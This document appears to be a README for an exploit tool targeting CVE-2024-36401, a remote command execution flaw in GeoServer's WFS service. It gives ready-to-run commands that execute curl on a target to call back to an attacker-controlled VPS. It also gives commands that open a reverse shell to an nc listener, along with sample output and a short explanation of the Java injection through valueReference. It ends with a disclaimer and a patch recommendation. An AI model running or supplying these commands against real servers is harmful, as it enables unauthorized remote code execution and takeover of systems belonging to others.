## https://sploitus.com/exploit?id=A8DDAE00-4887-53C3-8DB9-42679733BC0C
# CVE-2024-36401 GeoServer Exploit Tool
## Vulnerability Description
CVE-2024-36401 is a remote command execution vulnerability in GeoServer. Attackers can execute arbitrary commands without authorization by constructing specific WFS (Web Feature Service) requests.
## Environment Requirements
- Python 3.x
- Install necessary dependencies: `pip install requests`
## Usage
This tool supports two modes of use: `cmd` mode (directly executes commands) and `reverse` mode (sets up a reverse shell).
### 1. Test Whether the Target Is Online
Assume the VPS address is `111.46.112.85`.
Use the `cmd` mode to execute the `curl` command to test whether the target server can access the external network:
```shell
python exp.py cmd "8.147.134.121:32831" "curl http://111.46.112.85:8090/hello"
```
**Verification Method**: Start an HTTP server on the VPS to receive requests.
```shell
# On the VPS
python -m http.server 8090
```
If the reverse shell connection is successful, you will see output similar to the following:
```
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ... 39.106.20.178 - - [04/Oct/2025 17:22:30] Code 404, Message: File not found
39.106.20.178 - - [04/Oct/2025 17:22:30] "GET /hello HTTP/1.1" 404 -
```
### 2. Set Up a Reverse Shell Connection
Use the `reverse` mode to set up a reverse shell connection to the specified VPS and port.
**Step 1**: Set the listening port on the VPS.
```shell
# On the VPS
nc -lvp 6666
```
**Step 2**: Execute the exploit tool to initiate a reverse connection.
```shell
python exp.py reverse "8.147.134.121:32831" 111.46.112.85 6666
```
After execution, the tool will display the following output:
```
[+] Response Status: 400
[+] Response Length: 1121
```
```
java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.fea
```
If the exploit is successful, the nc listening on the VPS will receive a reverse shell session.
## Tool Parameters Explanation
```
Usage:
python exp.py cmd
python exp.py reverse
```
- `cmd`: Executes a single command.
- `reverse`: Sets up a reverse shell.
- `ip`: Target server address and port, in the format `ip:port`.
- `command`: Command to execute on the target server.
- `VPS_server_ip`: IP address of the VPS server.
- `port`: Listening port number on the VPS.
## Vulnerability Principle
This vulnerability exploits a security flaw in the GeoServer WFS service. Java code is injected into `valueReference` to execute system commands. The tool sends a malicious XML payload to the GeoServer’s WFS interface, thereby executing remote commands.
## Notes
1. This tool is only used for security research and vulnerability testing. Do not use it for unauthorized testing.
2. Any consequences resulting from using this tool are the responsibility of the user.
3. When using the reverse shell function, ensure that you have permission to access the target system and operate within the scope permitted by relevant laws and regulations.
4. If it is a test environment, the setup team may modify some default routes to make the EXP ineffective. In this case, you may need to modify the field `/geoserver/wfs` to the correct content.
## Fix Suggestions
Update GeoServer to the officially released secure version and configure the server according to best security practices.